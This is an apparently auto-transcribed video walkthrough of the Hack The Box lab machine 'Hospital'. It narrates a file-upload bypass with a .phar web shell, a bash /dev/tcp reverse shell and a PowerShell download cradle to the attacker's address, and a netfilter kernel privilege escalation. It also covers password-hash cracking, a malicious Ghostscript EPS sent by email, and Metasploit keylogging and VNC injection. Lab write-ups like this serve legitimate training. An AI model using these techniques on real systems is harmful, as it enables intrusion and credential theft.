what's going on YouTube this is ipag on Hospital from hack the box which starts out with hacking a file upload form you can use this to get code execution there's a few tricks but once you do you're on a Linux container and you look at the kernel it is a little bit out of date from like February 2023 so it's over a year old there are a few intended 2023 cves that you can use to prives but I'm going to end up showing a very recent one I think it came out like a month ago the net filter one in 2024 because it's just more relevant today we'll use that to prives we get root on the container we can crack some hashes that enables us to log into a doctor's email discover someone's using go script with EPS files to do some conversion there is a vulnerability there so you can email them a malicious EPS document gain shell on the Windows box and from there there's two different prives the more interesting one is um uploading a key logger and then just logging the keys and discovering they type a password in so with that being said let's just jump in as always we're going to start off with with an end map so- SCC for default scripts SV enumerate versions OA output all formats put the end map directory and call it hospital then the IP address of 10101 11241 this can take some time to run so I've already ran it looking at the results we have quite a few ports open the first thing we see is SSH on Port 22 and its Banner tells us it's a Ubuntu Server then the next thing we see is DNS on Port 53 and its Banner says it's simple DNS Plus and then we have a bunch of Windows things related to active directory so is this going to be a Ubuntu machine or Windows machine at this point I don't really know I guess the hack the Box platform does tell me this is Windows but I don't know which IP is holding 101 11241 so right away I'm just going to go ahead and add the host names to my host file before I forget the step and then we're going to do a little bit of network analysis to find out um which host is 10101 241 because it looks like there's two so hospital. htb I got off of the ldap certificate and we also have dc. hospital. HTP so let's go ahead and add this and then real quick while we're in end map might as well look through all the ports so we know we got an SSH server we have active directory um there's nothing on Port 80 but 443 does have Apache and it's telling us it is running on Windows 64 and it has PHP enabled most likely this is a program called examp xpp that's the most common way to get like Apache and PHP running on Windows then we have SMB on 445 um looks like a lot of ldap stuff there uh 3389 so we got remote desktop open to us and then 880 has a second web server and this one is Apache again but it's running Ubuntu so we we have quite a few ports that have both Ubuntu and Windows so the easiest way to look at this is just going through the TTL that is the time to live right um we can just ping 1010 11241 and we see the TTL of that is 127 that immediately tells us the um host of this computer is Windows because like Windows defaults to 120 it is the TTL and it decits one every time it hits a router there's the VPN server between me and this Windows box so that's why it decommitted to 127 however we can go one step further and just look at the TTL on a network connection right so normally I use wire shark in my videos to show this but since we've shown it before let's just do TCP dump so we going to do TCP dump on my ton zero interface so that's the um VPN interface you need to add- V for verose to show um the TTL by default TTL is not shown unless that whenever doing TCP dump I like dasn to hide DNS and then to get rid of some fluff I'm going to say IP source is equal to 1010 11241 because we only want to see packets where the source address is coming from this guy if we didn't have this we would see connections me going to the server and the server coming back to me right so let's run this TCP dump command and then we just to make a connection to a port so I'm just going to use netcat you could use Curl you can use anything you want so we'll do netcat 10 10 11241 and then we can say Port 22 and we see the TTL is 62 Linux by default sets it at 64 and it's got two hops it's got a hop Through the Windows which is acting as a router it's probably running hyperv and then it has to hop through the VPN router so it's two hops to me and what this is telling me is hyperv play if it was Docker Docker doesn't decrement the TTL um I don't think the windows subsystem for Linux decrement dtl as well maybe it does I'm not positive but this is what um Network forensics can kind of tell you if we go to like 443 that was the windows Port you see the TTL is 127 so now we know the um external facing thing the main host is going to be a Windows box doesn't help us all that much but any type of Recon we can get early on definitely is beneficial so let's just go take a look at https and we'll see what this web server is um we just want to accept the R and this is loading a round Cube instance and we don't know any username or password so this doesn't really help us too much we could potentially try to find the version I think there is a way you can figure out the round Cube version um not positive if we just do GitHub roundcube maybe it's like readme.md or something let's see readme.md does this exist forbidden so the probably is a way to enumerate the round Cube version but it's not that beneficial um let's go take a look at what's on Port 880 uh we don't want to do https I don't think and we just get a um login page we could test like credentials if we do admin password to see if this works we get invalid username and password I was hoping it would tell us if the username existed or not let's try making one let's create the username admin and do password and we see usernames already taken so we know the username admin exists on this website there is a way to enumerate valid users let's now just create the username IPC and then log in so if we do IPC password uh we get logged in and it looks like just a simple file upload and I notice this is running PHP so let's try uploading a uh PHP file or it's telling us uh what type of file does it want us to upload first image files so let's grab an image file and then just see what a legit upload looks like so let's do locate PNG I'm just going to grab a random PNG here copy it and then we can go to browse um let's go htb hospital and then upload this and I'm going to want tell my burp Suite I want to intercept this request and then forward it along and then let's forward this request and we saw it redirecting us to success. PHP we don't see where the upload is stored if we try like guessing a directory maybe it's in uploads that's a common place we get it forbidden so we know this probably exists if I do a directory that doesn't we get it not found so we know uploads does exist now we just have to guess at the file name the first thing you always do is just guess at the name you uploaded so like buttons. PNG is what we uploaded so if we try this we do get the image we uploaded um if this didn't exist I try like the md5 sum. PNG just the md5 sum I try just things that developers do to um rename files but since we know we just can upload a straight file let's go over to the repeater tab where we um sent that request to I'm going to change the PNG to be PHP and we get a SL fail. PHP and if I try buttons. PHP we get a not found so we can't upload that if I did like PHP 3 five these are all going to slash failed if I do like 99 we get success so we know this filter is a blacklist right because an unknown extension it works um something else you could do is you could send this over to fuff and then guess that way let's try that because that's always a fun exercise I'm going to copy to file and I'm going to make this upload. request we can save it and then let's just make sure it looks like as we want that looks fun um I saw a bunch of gibberish but that's just the image right but this looks like a normal upload so let's edit this we're going to change the extension right here we're going to put fuzz and then we can do FFF Das um request upload PHP D request dpro HTTP uh by default it's going to do https so you want to just say HTTP and then we do the word list so we'll do opt and I'm going to use um let's see OPC list uh fuzzing and then there's extensions so let's do opt SEC list fuzzing and then extensions extension star and I just want to get a small word list to start um let's see for I in do cat i wc- l uh permission denied uh we want to do LS there we go we also need to say Echo dasn I there's probably a better way to do this I bet if I did WC DL extens like that um we got to go in that directory I bet this would also do what I just did eventually I got there right so that's probably too many um this seems like a good number i' want to do so I'm just going to copy that let's look at that file real quick that looks fine let's do PHP 4 oh PHP 4 is not there that's not what I want um does boom have php4 that's just like a common extension I want uh that has percent something that's like format strings let's just do most common so picking the word list is always something that takes a little bit of time this looks good uh so let's do extensions most common fuzz and then we send the request off and we can see every request right now looks the same we want to be able to match for when it contains success but I don't think the match regular expression in fuff actually looks at the headers so if I do success let's see uh it is all lowercase oh it does look at headers I think so we can see all these extensions worked so we could do PDF CFM CFG docx doc our um phtm maybe like phtm will get code execution so we can try that so let's do erase all of the binary data and then we can do PHP system who am I like that and we want to make this file phtm Cur it got the redirect so if we go to this phtm we just get the file so that did not convert it to PHP um one extension that I don't think's in that word list we can look for it um let's see we did it down here let's go back to this we can grap uh far P A and that doesn't look like it's in any of those but f is another good PHP extension so let's try doing that one I'm sure if you did blog post and just ways to like valid PHP extensions this is one of the more common ones it's just one of the newer ones and now let's go back to this page uh we need to change the extension to far uh buttons. far does not exist it said upload success that is bizarre okay but uh let's do test. fur something is behaving really weird so we get the file we do view Source oh I'm in view source so I don't know why buttons wasn't working but test is kind of we don't see any output here and that is like really really odd uh let's just do this in curl so we can actually we can do it in burp Suite uh let's just do intercept this request intercept send we just have a blank response if we do Hex I think it sends nothing maybe maybe it sends 89 I don't know exactly what 89 translates to uh I want to try buttons real quick so buttons is working here it must be like a web browser caching thing where maybe I like erase the N maybe that's what was happening but we're now using test. far we have no output and what this tells me is there's something blocking our PHP code because I should either see the shell I uploaded like this string or I should see the output of who am I since I see neither of those I know it executed my PHP and decided to do nothing we could change this over to an echo command and if we do that we see now it echoes the thing it doesn't say like Echo space who am I so we have code execution so what we want to do here is do a PHP info so if we do PHP info and then let's just go back to test. far we can turn intercept off as well we will have the PHP info thing and the thing I'm looking for is disabled functions and we can see they have disabled a lot of functions here and like the shell exact system so we can't use system we can't use shell exact we can't use just exact so this is why um the system command failed we could probably just like manually read files but we could look for any function that's dangerous that isn't um disabled and if we use like Pony shell I think this is it I'm not actually going to use this I'll just talk about it real quick um this is a good single file PHP shell that automatically does a lot of the bypassing for you but I want to show it right if we go to shell. PHP um we can see before it tries to execute command it's looking if these functions exist right we got system OB start OBG and if those exist it's going to build a uh Gadget to use these functions to execute if we look at what all function exist does uh it's up here all it's going to do is say if function exists right so that's all this is doing it's automating the um way to do these type of ways to get code execution but if we went to ic. ro I want to say like PHP disable um I used a thing called defunk bypass in this up down video we're going to redo everything we did in that video so if anything doesn't make sense go back to that one uh I think I have to do defunk bypass GitHub this will bring up the page I want and the downside with this is it's going to be in Python 2 and I hate using python 2 so we're just going to convert it to use PHP which again I did in that previous video it doesn't take much time the way they intend this script to be ran is you grab all the disabled functions from PHP copy and paste it into this Python and then work it that way what I'm going to do is just do it all in PHP so I'm going to grab all their dangerous functions so if we like Google any of these we'll find a way to execute code so let's do V dangerous. PHP and I'm going to say dangerous functions is equal to array like that and then let's make this PHP okay and then we want to just do a loop so um is it four each dangerous forget exactly how to do PHP for each Loop this is embarrassing I think it's like for each dangerous function in something let's see for each blank as value okay so dangerous functions as F there we go and then we just want to say if uh was it function exists and then F then we can say Echo um let's see we want to say f then period is a concatenation exists and then let's do a line break enter I don't think I need the parenthesis there it's been so long since I've done anything in PHP let's try this probably should have closed that PHP tag but oh well it does not matter so we're going to put this okay then I'm just going to execute this internal server error so we screwed something up let's see dangerous function array I see it we need another parentheses there I can just manly fix that let's go here okay there we go so we have a few we have a log poop link Sim link CIS log and mail poop's probably the easiest one to exploit if we just do uh PHP poop run command we'll probably go to like their help page that tells us how to do it um let's see PE open manual and let's see we want to be able to read the output so let's grab this paste this in okay hold on one second I'm going to put this in and to get rid of this parentheses and we're going to rerun it okay I was wondering if this error reporting line would uh of um magically just put the error message in that HTTP request because that would come handy when you're just troubleshooting things but I think apache's um not in developer mode or whatever it is it's in production mode so it strips all 500s so here we have the script we got a poop path to executable so let's just do bin LS and I always like doing full pads um let's try without a full path real quick when we do a p open oh it still works right we see our two items so we don't need the full path there so we can now um navigate the file system so what I want to do is get a reverse shell so we can do a B- C b-i Dev TCP 10 1048 9,10 and one like that okay close off the double quote that looks good send it let's listen on 901 and then I'm going to go over to this tab run it we're hung here that's a good sign because we have a shell and then whenever I get a shell um I always like making sure I don't hang the server completely so I'm just going to try getting it again so if I cancel this request send it again we got it okay so every now and then when you get a shell it may hang the whole web server so I always just like testing for that because you don't want to create a outage that you don't know about right so let's upgrade this shell to be a proper PTY so python C import PTY PTY spawn bin bash uh close the parency like that stty raw minus Echo FG enter enter export term is equal to X term awesome so now we have a shell on the web server as dubdub dub data the first thing I always like doing is looking for a database um let's see uh we have uploads login where's like settings.php I guess we could cat login.php and oh God I hate when they like end a main goal HTML and PHP uh let's see session start config.php how did I miss that it's the first one so let's we have root and MySQL service so let's do MySQL d root- p okay show uh tables uh show databases use Hospital show tables select star from users so we have two hashes right here so we could grab them so V hashes I'm going to call this hashes do 8080 I guess um we could call it like patient upload or something like that I always like putting the username as well and let's see we can grab this patient okay so let's cat this put it on a clipboard and then I'm going to attempt to crack these so we can go to the Kraken go hashes or hash cat hashes I'm going to call this Hospital 8080 slut. bin hashes Hospital 8080 word list uh we don't do d op word list Rock and this is probably going to fail Auto detection mode maybe uh oh we have to do das Das user let's see and the mode is this U we're not using forms e-commerce it's just going to be standard bcrypt so- m3200 so now that the cracking is going in the background and I don't think that's actually going to crack but I do want to just show those steps every now now then we want to see what else we could do on the server if we look at the uname output we can see this kernel is uh February 3rd 2023 and I think maybe the intended is like um game overlay or another like old prives but I'm going to do a unintended pesque just because it's another old konel I don't see the purpose of showing you a konel pesque that's over a year out of date I'd rather show you one that's like a month out of date right so let's go over to our web browser and and look for one um I wonder if I just do uh un name- a again real quick would it just come up if I googled this Colonel let's see uh Colonel exploit this let's make sure burp Suite is indeed off I don't know if it will uh let's see this is the one I think that's intended this inactive one which I think is game overlay but I don't think this is coming up so let's see I'm going to try Linux konel prives and I know there going to be a super generic result but if we do um tools anytime past month and let's go to the top result and let's see I want to say this is good between version 514 and 66 that is a lot of versions and we're 519 so chances are this is going to work just because we're between those two versions so I'm going to download this and you should always compile it yourself um but we're in a lab environment so we don't have to we cracked both of them so admin password was 1 2 3 4 5 six and patient is patient um but let's do make D dubdub dub W get that's not what I want let's copy W get this okay python 3M HTTP server then we can Dev shm uh W get 10 10 14 8 8,000 exploit there's really no harm and if this exploit was malicious of it really affecting anything cuz I'm running it on a temporary computer right so I just want to see if the prives works and if it's stable so let's run it and immediately we get over to root so this is a valid prives um this is like the NF tables pesque so if you want to go back this is a good cve for it right it affects a lot of kernels uh let's see so from here what can we do as root well now we can read the shadow file and let's just do um cat Etsy Shadow GP everything that has a dollar in it and there's two we have root which is this weird encryption um dollar y dollar and then Dr Williams which is something we're used to seeing I'm going to start this um crack off and then we're going to talk about the other one I don't think the other one's actually supported in hashcat yet maybe it is in the newest version if we updated uh let's do V uh hashes hospital. Shadow paste this go back to a hashcat I probably should have done the user but oh well okay so that's cracking so this whole um dollar y dollar this is actually yes script um and we see it's already cracked uh so we'll go back to that cracking in a minute but when I want to look at um what encryption things are relevant we can always use the Man pages you could go to Google but Google actually took me longer to find than just using the Man pages maybe chat GPT would help me as well but knowing how to man page use Man pages is very important if we look at this we can see the description in the Crypt table encrypt is just how Linux does encryption right um it says hashing methods described in Crypt 5 now a lot of people may just be confused by this um but we can just do man 5 Crypt and then it talks about that so what is that that is a page of Crypt or man page right if we look by default we're on page three here and what are those pages let's just do a man of man and it decide tells you what each page is um one is for executable programs five is for file formats and conventions so that's why all the ing conventions would be in page five of Crypt um Library calls which um Crypt is a library essentially a dll if you come from Windows so that's why we default to page three um CIS calls would be on page two right so this is just how the man page is organized so let's go to Man 5 Crypt and then we can see how things are set up right and available hashing methods and then we have yes script prefix dollar y dollar here's the format it's pass phrase um details about it right then you got the ghost yes scripts if it's a gy um it talks about all them scrypt is dollar 7 bcrypt is dollar two then b or X or a or Y can be those things so this is a great way just to familiarize yourself with exactly how hashing works right because it tells you what everything is um shop 512 crypt the next thing after the 6 is going to be the rounds so just a good resource in general but let's look at what hashcat has told us it said the password for Dr Williams I think that's what it was in the shadow file is qwe bang pound so Dr Williams is right there so this was a Windows box right um so let's try we can get out hashcat now um net exec and then SMB 10 10 11 uh 241 and then we want to do- Dr williams- P and copy the line break there we go let's put this in quotes and send it on off and we'll see it does authenticate so whenever I see that I always like just making an invalid password because I like to seeing an authenticate and a de authenticate because sometimes windows will tell you everything's valid so we know um that is the valid password we can do D- shares and see if there's any unique shares that Dr Williams has access to it does not look like it if we do Dr Williams let's try like winrm see if that exists uh we don't want to do shares with winrm no is RDP a thing I want to say it isn't net exac right uh net exac DH uh FTP ldap RDP it is it didn't give me any output I don't exactly like that uh let's try xree RDP SLV 101 11241 U Dr Williams p uh I'll put the p on standard input because I'm not positive how that works yes password and we have a connection failed um so what's next well remember there was a round Cube instance on https so let's go back there uh we're on 880 Dr Williams put in the password log in and clean up some of these tabs and we get logged into Dr Williams Mail and there's inbox does have one message need needle uh needle designs for Darius Simeon and let's see project later can take he wants a EPS file so it can be visualized with ghost script so I'm going to Google EPS ghost script exploit to see if there's any way I can send him a malicious attachment and right at the bat we have one so if we look at this we have a cve to create a malicious um EPS file so I'm going to clone this repository okay and then let's see how does he use it it looks like there's a generate reverse shell IP this looks like exactly what I want so if I run this let's change the reverse shelf information 9,1 10 10 14 8 okay so it generated this uh EPS file so I always want to look at exactly how it works um to understand the exploit so it looks like something after stroke maybe I'd have to look in the cve but this is the payload it's using and right away I can see this is not going to work on Windows this reverse shell payload is only a Unix thing I don't see any like win reverse shell payload I'm going to do a gp-r on rev shell and let's see I only see Unix here I was hoping to see a win underscore so we have to figure out a way to get a Windows reverse shell on this um so let's see um I'm going to create actually a new window just to stay organized a bit better we can go in here uh we want to create a oneliner that does code execution so I'm going to do CP user share Nang uh shells invoke Powershell TCP on line PS1 I'm going to call it shell. PS1 so I have to type that name again and I don't have to do it this way um but I always like having a web server like a web cradle execute it because if I just encoded this and sent it to the server and Antivirus picked it up I wouldn't know if my code execution worked right so if I do a web cradle so the server reaches back to me to download the payload um anus is not going to trigger that often when making an HTTP request so that validates I have code execution and if I don't get the shell then I know AV probably block the shell or I made a typ or something like that so that's why I like making this a two-step process instead of just doing a onstep we can show it will probably work both ways but I just want to kind of explain my logic as I go um so we have the shell there our web server is in this one let's just close that out so we can listen here so now what we need to do is create a oneliner to execute that so I'm going to do Echo then IEX new object net. webclient download string I always like doing the download string in single quotes So HTTP 10 10 148 8,000 shell. PS1 like this awesome and now to avoid any like quoting issues because we got that double quote there the single quote I always like just B 64 en coding it and windows likes things in utf16 little Indian so we're going to do I convert or ion t for Target then utf-16 little Indian and all that does if we pipe it over to xxd we can see every character it just puts it uh null bite afterwards because it's 16 bit encoding right if we remove that um whole icon command you can see it doesn't have that but that's how Powershell likes its base 64 and everything else so let's do a base 64- w0 so now we have our web cral command so this is going to execute whatever's on a web server so let's go um back to this cve so Python 3 cve was it generate then we can do payload I'm going to do Powershell ENC paste in that and then we need file name shell. EPS um we'll do shell and then extension EPS there we go so now we have a shell. EPS let's move that up One Directory to say a little organized look at it that is definitely our powers shell command let's listen on 90001 and then go back over to round Cube we can reply to him uh wait for round Cube to get the message intercept is off it's just taking its time attach a file shell EPS here is the design spec you want and it's going to Dr Brown send it waiting for it to send it's sent so now what we want to do is wait for an htttp request to come and see if we get the reverse shell and waiting it'll probably take like 60 seconds oh no we got it almost looks like the shell came before I saw that HTTP connection but there we have it as Dr Brown right so again because it made this request we know it got there and then obviously we got the shell but if we didn't want to stand up that web server um we didn't have to uh let's just show that real quick um was I in dubdub duub I was so cat shell PS1 I con to UTF 16 little Indian base 64 w0 let's just make sure sure this work so I'm not lying to you when I say things uh should just do like xclip to copy this but oh well copy that run this again think I do control D no um I always forget the hotkey to delete a whole word I thought I had memorized but apparently not so we have a lot more B 64 paste um file name shell two oh we got to go in that directory there we go let's move shell two up One Directory NCL lvmp 90001 and we will send that message again I'm just going to make that full screen waiting and before I send it I realize I always like using RL W when I do a window shell so we'll attach it we don't need to send a message I don't think let's just clear that can exit that because that gives me the up and down aors when I'm in my window shell so it's a big quality of life thing so we can send that one there and if we look we have nothing on 8,000 anymore so there's no way for it to hit our web server we should just magically see the shell come in as long as this worked I guess and there it is so again you don't have to do the web cradle but it is good practice anyways now we are Dr Brown if we do a DI in his directory we see there is a file called gript if I look at what gript is we can see it's running Powershell um it looks like this may be Dr Brown's password right here is Chris Brown looking at it it's running um grip. exe against every file in his downloads so this is just automating um executing that EPS file right um nothing too interesting here other than you could get Chris Brown's password if you wanted we could verify that is indeed his password with net exac so net exac SMB 101 11241 uh dasu what was the name uh Dr brown- P and then after this we can check wi RM as well to see if he has member of remote users right so running this it looks like uh we could use Evo winrm if we wanted to establish a shell again as this user um we already have power shell so we don't have to do that but it is an option if we wanted to so let's think about this right um there's two ways we can really get to root from here uh the first one's the unintended that's going to be what I'm going to show first um because it's just so much quicker right if we went back to our end map so if we go end map Hospital look at 443 we knew Apache was listening on uh Windows as well um the Apache instance we had exploited initially was the one on port 8080 which is on Ubuntu so we know the Windows Server did have a web server and I always like whenever I land on a box especially Windows to get code execution also as the web user because there may be like an sem impersonate um privilege that you can use uh one of the potatoes to get um admin so let's go do a DI here and we go in examp because this is normally how Apache is installed on Windows um HT docs is normally the like ver dubdub duub HTML and here we can see um PHP files install I bet install was the file I was thinking of what if we just did install on htps is that blocked um after 241 slash forbidden so H access is blocking access to this but uh this is round Cube if we put a shell here so let's just try Echo PHP uh system who am I like that we probably want a let's see close the PHP tag semicolon and call it shell. PHP so if I now go over to shell. PHP do you think it's going to execute we did not it didn't execute anything at all and there's something at play that we kind of talked about earlier in this video if we look at shell. PHP um wait what there we go it just took a while for that type command to work but it looks fine let's go over to curl or better yet let's do burp Suite so let's do proxy intercept yeah let's do intercept on send this go over to repeater Tab run this this looks fine right but what if we go over to hex what are we seeing we're seeing it's utf16 little endian encoded because that's what um Powers shell likes right we can see this is the P this is H right and this is actually blocking the magic bite check for uh where is it not there not there right here when it's looking for the um less than question mark it's actually failing because it's not utf8 uh the car set here says utf8 and the response but it's utf16 little Indian so to fix that we want to um do a what was it out encoding no outfile I think we do outfile Dash encoding and we can say utf8 and then the file name shell. PHP I think that's what we did let's go back here run it that looks better I see Authority right so it's no longer UTF 16 little endian encoded so we have a shell and wow we're system as the shell so all we have to do here is um change this up so we have code execution so we can say request CMD like that and then we can change this to be a post request CMD equals to Mii uh still not working PHP system request that should have worked type string an array was given what did I screw something up PHP system that is bizarre I'm really not sure what's happening here oh Let's Escape this um my file was system and then CMD it escaped this request because it thought this was a variable at least I think that's what just happened um let's replace these quotes let's do single quote here double quotes here single quote there there we go that should fix it there we go that was a weird issue so now we have a shell so let's see do I have uh let's if I do a new thing um generate is this it let's just go cve oh was dub dub dub we can say this copy I can say command Powershell encoded this string and that does not look like it worked. exe encoded command see where is this erroring to we have that wonder if I have to do like that no hop thing and stuff see what begins with no no profile that's not just it non- interactive is my command getting terminated don't think so what if my argument just too long what's that plus that was it so I had a plus right here in this encoded command so I forgot to URL en code this and that's what was causing the issue right if I do control shift U you can see a plus there there's probably a few other pluses but that's what was breaking my base 64 it was getting translated to a space right so always make sure you yourl in code but now on this one we do who am I we are system so of course we can go users administrator desktop and we get the flag if we wanted to so that's the uned way um the intended way is much cooler so if we looked at this box if we do like task list think that's going to work right is our rep just making this take a while um maybe get process will work so looking over to these results we see something that sticks out right away we have some process with one which indicates it's an interactive login um these are probably VMware ones SV host but let's see we have inter explorer was that I saw shell experience Powershell search UI elas here we go Internet Explorer so we see someone is logged into this box um h m server this is zero so that's the non- interactive that's just running as a service um one is Explorer as well if we did qw insta we can see Dr Brown is physically logged in the state is set to active um where ID zero um if we do let's see who am I we are Dr Brown so we're still Dr Brown we're just in a non-interactive to the desktop session um if we also did was it query user I think that shows logged in users too but we want to become process one right or ID one we shouldn't say pit process one because that's something completely different we want to become an interactive one and and if we do then we can run a key logger and see what Dr Brown is typing into the computer or we can like set up a VNC thing look at the desktop things like that so let's go take a look at exactly what Dr Brown is doing um and the easiest way to do this is going to be through Metasploit because we have to inject ourselves into another process and process injection in Powershell is just a big pain so I'm going to be using metas plate for this let's do msf Venom um- P don't exactly remember the flags uh- L payloads to get a payload for this let's wait for it to list I guess while that runs we can say msf DB run pseudo there we go windows x64 meterpreter okay see we just want reverse TCP so this is going to be a stage list payload it's going to make it a lot bigger um so we want just reverse TCP like this msf Venom DP K reverse TCP then L host is equal to 10 1048 L Port is going to be we'll do 901 again um what is it DF for format exe d o for outfile msf. exe did I do this right do we make an executable um use multi see search Handler use I think it's multi Handler listener multi expit multi Handler it's been a while since I've touched Metasploit okay show payloads I just done set payload my bad file F .exe we have created a 64 bit awesome um set [Music] payload Windows x64 meterpreter reverse TCP set L host t zero set L Port 901 run let's move msf. exe to dubdub duub let's make sure we have a web server listing so we can download this let's just go over into program data because that's a good spot to write things on Windows WG HTP 101048 Port 8000 msf. exe let's download it not found I'm not in dubdub duub there we go run this sending the stage we should get a call back there we go session one has been opened um so how here we are in interpreter if I do BG we can background that um do want to inter interact with it I'm not used to like the output of it actually saying the working directory here um if we do help sweet so I'm going to do a PS so we can list all the running processes and then we just want to migrate into something that is interactive normally when doing a key logger you either want to go into the process you want to monitor yourself or go into explorer.exe I'm going to choose explorer.exe so I'm going to migrate into 2288 and again the reason why we can do this is because um uh is it get your ID there we go because we're Dr Brown and we're going into another Dr Brown process right so if I do migrate we're going to go over into Explorer and the reason why you may not want to do this is because if you crash Explorer it makes it obvious on the desktop but normally it just restarts if you crash Internet Explorer Internet Explorer window would just close and maybe it doesn't get noticed but here we have it um started if I do help there is a key scan command so we can either send keystrokes key events but we can do a key scan start so let's do key scan start and then if we look at this whenever we want to um get what's on the keyboard or key logger we do a key scan dump so if I do key scan dump it's dumping the captured keystrokes we don't have anything yet so if this doesn't get anything then I'm going to probably switch over to the Internet Explorer process um let's see get P ID I am 2288 oh I'm in VMO tools I want to get in 2612 I guess is it parent process P okay now um the parent of that VM word tools process is Explorer I am in Explorer this is where I am and we don't have anything so I'm thinking maybe you actually have to be on an Explorer for this to work let's see is there a quick way to do VNC no uh let's see search VNC BG search VNC see VNC inject let's just do this one set view only is true that's fine see listen for set L host ton zero I thought there'd be an argument to um like use my session it's been a while since I've done this fcy server what did I do I did do inject maybe there's a post exploit for this uh Ms remote VNC gather let's see use post Windows manage payload inject Okay this may be better has been moved let's just use what it's moved to let's see set payload this is what I want I think let's see set payload this set lhost ton zero okay the ID set session I think we're at session one right sessions DL yep and then we can do setp ID 2288 run is this going to work uh we don't have VNC viewer pseudo apt install VNC viewer uh pseudo app search VNC view see maybe this zudo app install hopefully this works okay we now VNC viewer so it's setting up all the tunnels and we're sending the payload we should see a VNC viewer window pop up soon but maybe it's not wonder if it just set my TCP relay on ton zero because I think we just crashed our session see VNC viewer 27001 5900 oh nope we didn't crash it we have it working so this is the desktop of the server we can see them typing things right so we have successfully injected VNC so we know we're halfway there uh let's foreground this um BG did I kill that not sure if I did so let's see key scan dump oh it was logging it just took a while right we can see them type administrator and then the best hospital whatever U bunch of numbers so if we do net exec SMB uh 101 11241 U administrator DP get logged in and I want to see them actually start typing login failure is there no exclamation point let's see I guess we can log into round Cube as administrator and see but I think they're about to start typing or I was on view only when I hit alt something's happening that should not be happening let's see let's log in to round Cube make sure we have the password so that's without the exclamation point we'll do with an exclamation point see let's try the very last one are these all the same or different connection to storage server failed there we go uh let's see was what's the difference between this th3 B so they're different um this was a lowercase b so this one was the uppercase we have it pwned so we could use just like uh PS exact. Pi I guess if we wanted to uh 10 101 241 administrator at requesting share and that's how to do it the intended way right so I hope you guys enjoyed that um I always like just snooping in on VNC sessions uh apparently this is not view only I thought I was in view only mode but definitely not because you can see me interacting with the desktop here so yep take care guys I will see you all next time actually that's a lie as soon as I stopped recording the video we saw um the schedule task start up back again for it doing all the typing so if you wanted to see just what it's doing we can watch the automated script run and start typing in the password and if you didn't want to do a key logger and you did get this VNC session where maybe you got Chris Brown's password you could log in through moot desktop I don't know if Chris Brown Ken um then you could probably just click on the password field and unmask it right so here we see it typing administrator the like latency in this is awful like VNC is not a um good conduit of like remote administration because you can just see how slow it is but we can see all the stuff coming and soon as it attempts typing this in I'm going to click that literal I and then that will unmask what has been typed right let's see I click this so this is another way we could have grabbed the password without doing a key loger but again you still need get VNC up um I guess let's check Chris Brown if we can remote desktop uh what was it x free RDP it's not in this window I have no idea which pain we did that in um see where's Chris Brown's password Dr Brown oh is this Dr Brown's password yeah documents type uh what's in here type go script. bat let's see can you RDP Dr Brown RDP that just fails X3 RDP uh 10 10 11241 Dr Brown password and we can log in through RDP so if we grab the password then we would be able to get here and unmap weird this shows it I don't see is it because I'm in RDP that I don't have access to that button I don't think I've ever experienced that before um let's see x free already PP console is it just like SL console SL admin let's try that we can see typing in the password but again we don't have that button to unmask it I think that's because it knows when remote desktop and it's like I'm not going to give that to you which is uh cool I just didn't know it did that and those are the things you learn when you just go the extra mile so with that SL admin flag I do have this button now so I can see it typing it probably got screwed up because I was clicking when it started typing but I'm going to take that admin flag off real quick and I'm going to see if that button exist it doesn't so the SL admin that gives you a console session and I didn't really think it did anything nowadays but obviously in Explorer behaves a little bit differently when you add that so um today I learned or we don't have it now what so if I refresh the page did I have it because like the page loaded when I was RPD like I'm getting even more confused now okay so I have it that way so I'm going to exit this let's get rid of admin okay so I guess you just have to have the session open when the um input goes over to the password yeah so the input box has to be empty and then you have to have um be remoted in at that time because I see it now I'm going to close out and then we'll open it again and I'm guessing I won't be able to see it yep can't see it so that's pretty cool um it's a weird Behavior I don't even know how that's working under the hood but it is if you I guess um remote desktop long enough you would eventually see it type the password or there's probably some JavaScript you can do to um just unmask it yourself so with that being said take care all and I will see you all next time